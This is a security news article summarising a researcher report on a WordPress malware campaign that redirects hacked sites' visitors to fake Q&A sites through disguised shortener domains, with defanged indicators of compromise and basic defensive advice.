Researchers have tracked a surge in WordPress malware during November 2022, redirecting website visitors to fake Q&A sites via ois[.]is. The campaign’s end goal was black hat SEO aimed at increasing the reputation of the attacker’s sites.
Now researchers revealed that since September, their SiteCheck remote scanner has detected this campaign on 10,890 infected sites. The activity has surged with over 70 new malicious domains masquerading as URL shorteners.
The hacked website traffic is redirected to low-quality websites running the Question2Answer CMS. The websites were proposing discussions related to cryptocurrency and blockchain. The main motto of this campaign is to redirect the traffic to generate revenue.
The threat actors moved all their domains from Cloudflare to the Russian bulletproof hosting services provider DDoS-Guard. All these domains can now be found on IP 190[.]115[.]26.9.
Unlike previous campaigns, this last one also uses redirects through Bing search results URLs and through Twitter short t.co URLs like t[.]co/Xa4ZRqsp8C and t[.]co/KgdLpz31TG.
The analysis of the compromised WordPress sites revealed that threat actors have injected backdoor PHP code to achieve traffic redirection and persistence.
The report concludes stating “On some infected sites we also find a similarly obfuscated injection in files like wp-blog-header.php. Website backdoors to maintain unauthorized access. These backdoors download additional shells and a Leaf PHP mailer script from a remote domain filestack[.]live and place them in files with random names in wp-includes,wp-admin, and wp-content directories.”
Users are recommended to update the software and plugins frequently and use 2FA, and place the websites behind firewalls.
This research was documented by researchers from Succuri